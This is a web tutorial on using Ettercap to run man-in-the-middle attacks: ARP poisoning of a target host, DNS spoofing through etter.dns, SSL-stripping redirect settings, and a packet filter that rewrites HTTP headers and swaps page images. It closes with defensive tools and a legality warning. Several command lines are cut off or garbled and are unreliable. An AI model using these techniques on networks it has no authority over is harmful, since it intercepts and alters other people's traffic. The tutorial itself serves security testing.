How(https://kalitut.

com/)
to use Ettercap
Last Updated on May 26, 2021 by Walid Salame (https://kalitut.com/author/walid/)

What is ettercap? Ettercap is a utility for analyzing network traffic passing through a
computer interface, but with additional functionality. The program allows you to
perform attacks like “Man in the middle” to force another computer to transfer packets
not to the router, but to you.

With Ettercap, you can check the security of your network, how susceptible it is to this
type of attack, and also analyze traffic from several computers, and even modify it on
the fly. In this article, we will look at how to use Ettercap to analyze and modify traffic.

What is man in the middle attack ?

How to install ettercap on kali linux
Using Ettercap GUI
 ARP poisoning Attack in Ettercap
DNS spoofing with ettercap
Ettercap Filters
How To protect yourself?

What is man in the middle attack ?

By default, the computer sends all network packets that need to be sent to the Internet
and sends it to the router, which in turn sends them to the next router until the packet
reaches the target. But for certain reasons, the packet can be transmitted not to the
router, but immediately to your computer, and only then to the router.

The computer through which the packets will pass can analyze the source, target
address, and if they are not encrypted, then their full contents.There are two ways to do
MITM (Man In Middle Attack):

ARP attack – using the features of the ARP protocol, your computer tells others
that it is a router, after which all packets begin to indulge in it;
DNS attack – when a computer tries to get an ip address for a domain, we
substitute this address for its own, but for this type to work, you need to use the
ARP method.

Ettercap Linux can perform both types of attacks. In addition, the utility can perform
denial of service attacks and scan ports. Now let’s take a look at how to install and use
Ettercap.

How to install ettercap on kali linux

This is a fairly popular program among network security experts, so it is in the official
it i f t di t ib ti F l t i t ll Ett i Ub t
repositories of most distributions. For example, to install Ettercap in Ubuntu, run:

sudo apt install ettercap-gtk

On Fedora or other distributions based on it, the command will look similar:

sudo yum install ettercap-gtk

We coped with the task of installing Ettercap Linux, but before using it, you need to
change a few settings in the configuration file.

sudo vi /etc/ettercap/etter.conf

The ec_uid and ec_gid lines must be set to 0 in order for the program service to work
on behalf of the superuser:

[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
Next you need to find and uncomment these two lines:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -
They are used to redirect SSL connections to regular HTTP, if possible. Then save the
changes and the program is ready to work.

Using Ettercap GUI

The program can work in several modes – with a graphical interface, without and as a
service. We will consider work in the graphical interface. To run a program with a GTK
interface, use the -G option:

sudo -E ettercap -G
We use the -E option for sudo to save all of our user’s environment variables. The main
window of the program looks very simple. First we look at how the ARP-poisoing
attack is performed.

ARP poisoning Attack in Ettercap

As I said, with this attack we can force the target computer to send packets not to the
router, but to us. Everything works quite simply. The computer knows the IP of the
router, it got it when connected to the network. But every time he needs to send a
packet, he needs to convert this universal IP address to a low-level address of the
network technology used, for example, for the wired Internet – this is the MAC address.

For this, the ARP protocol is used. The computer sends a request to all devices on the
network, for example, “who is 192.168.1.1” and the router, upon seeing its address, will
send in response its MAC. Then it will be saved in the cache. But we can use Ettercap

to ask the target computer to update its ARP cache and transfer its MAC address
instead of the MAC address of the router. Then all the packages will be transferred to
us, and we will send them where necessary.
Let us get to the point and execute the attack attercap arp spofing. In Ettercap, open
the Sniff menu and select Unified Snifing. Then select your network interface, for
example, eth0 or wlan0:

The program window will change and much more functions will be available to us.
Now you need to scan the network. To do this, open the Hosts menu and click Scan
hosts. Even if something does not work, then you can load the list of hosts from the
file:
Further, after a quick scan, if you open Hosts -> Hosts List , you will see a list of devices
connected to the network:
To start the attack, we need to specify target 1 and target 2. As the first target, you
need to specify the IP of the machine that we are going to attack, and the target 2 is
the ip of the router. To add targets, use the Add Target 1 and Add Target 2 buttons :
Next, open the MITM menu and select ARP poisoning :
In the window that opens, check the Sniff remote connections box to intercept all
remote connections from this computer:

Now, to start the substitution process, in the Start menu, select Start Sniffing.

After that, the program will start sending packets to the network, with a request for
192.168.1.3 to update the ARP cache and replace the MAC address of the router with
yours. The attack is started and successfully executed. You can open the View ->
Connections menu and see the active connections for the target device:

If the packet was not encrypted, then we can view the transmitted information by
clicking on the connection with the mouse. The sent information is displayed on the
left, and the received information is displayed on the right.
DNS spoofing with ettercap
A special service, DNS, is used to convert site names to network IP addresses. When
the computer needs an ip of the site, he asks him for the DNS server. But if you are
already performing a MITM attack, then we can spoof the server’s response so that
instead of the site server’s IP, our IP is returned. First we need to edit the
/etc/ettercap/etter.dns file:

sudo vi /etc/ettercap/etter.dns

google.com A 127.0.0.1
This record means that we will substitute the main IP google.com with 127.0.0.1.
Please note that this attack is not performed without the previous one. Further open
the menu Plugins -> Manage Plugin:
Then double click on the dns_spoof plugin :
The plugin will be activated and you can check the ip on the device. DNS is really being
replaced. For example, you can run on a target machine:

ping google.com

ping www.ettercap.org

In addition to these plug-ins, there are others with which you can perform the
necessary actions.

Ettercap Filters
Filters allow you to modify the packets passed through the program on the fly. You can
drop packets or make necessary changes to them using the replace function. Filters
also work only while the MITM attack is running. The syntax of the conditions by which

we will filter packets is very similar to wireshark. Let’s consider a simple filter that will
replace all the pictures with ours:
 vi test.filter

if (ip.proto == TCP && tcp.dst == 80) {

if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"https://pbs.twimg.com/profile_i
replace("IMG SRC=", "img src=\"https://pbs.twimg.com/profile_i
msg("Filter Ran.\n");
}

For those who have had experience with programming languages, everything should
be clear here. If the TCP protocol and the destination port are 80, we continue
searching and look for Accept-Encoding. Then we replace this word with any other, but
equivalent in length. Because if the browser will send Accept-Encoding gzip, then the
data will be compressed and we will not filter anything there. Next, in the server’s
response, the source port is 80, we replace all the images with ours. Now the filter
needs to be compiled:

etterfilter test.filter -o test.ef

It remains to load the filter using the menu Filters -> Load Filter :
Select a filter file in the file system:
The filter will be loaded and you can open any site where https is not used to make
sure everything works. To stop the MITM attack, open the MITM menu and select Stop
All Mitm attacks . Our Ettercap manual is coming to an end, but …

How To protect yourself?

Probably, after reading the article, you have a reasonable question, how to protect your
computer from this type of attack? There are several tools for this, including for the
Linux operating system:

XArp is a graphical utility that can detect attempts to spoof MAC addresses using
the ARP protocol and counteract this. It can work in Windows and in Linux;
Snort is a fairly well-known system to counter intrusions, among other things, it
detects attacks on the ARP protocol;
ArpON is a small service that monitors the ARP table and protects it from spoofing
MAC addresses.
Findings

In this article, we looked at how to use Ettercap, a program for analyzing network
packets and performing Man-in-the-Middle attacks. Use the program only to test the
security of your networks or applications, and do not forget that illegal actions in the
information space are also punishable.

Comments

jack says
May 16, 2019 at 8:20 pm (https://kalitut.com/how-to-use-ettercap/#comment-29)

where can i download this ettercap,the one i download is ettercap ng-0.7.3

Reply

Walid Salame says

May 16, 2019 at 8:23 pm (https://kalitut.com/how-to-use-ettercap/#comment-28)

you can download the newest ettercap from this page https://www.ettercap-
project.org/downloads.html
Reply

Mandi says
November 7, 2022 at 6:43 pm (https://kalitut.com/how-to-use-ettercap/#comment-
26768)

HI,how can i edit the ettercap file?Thanks.

Reply

H O M E ( H T T P S : // W W W. K A L I T U T. C O M )

A B O U T U S ( H T T P S : // K A L I T U T. C O M / A B O U T- U S / )

P R I V A C Y P O L I C Y ( H T T P S : // K A L I T U T. C O M / P R I V A C Y - P O L I C Y - 2 / )

A F F I L I AT E D I S C L A I M E R ( H T T P S : // K A L I T U T. C O M / A F F I L I AT E - D I S C L A I M E R / )

COPYRIGHT © 2023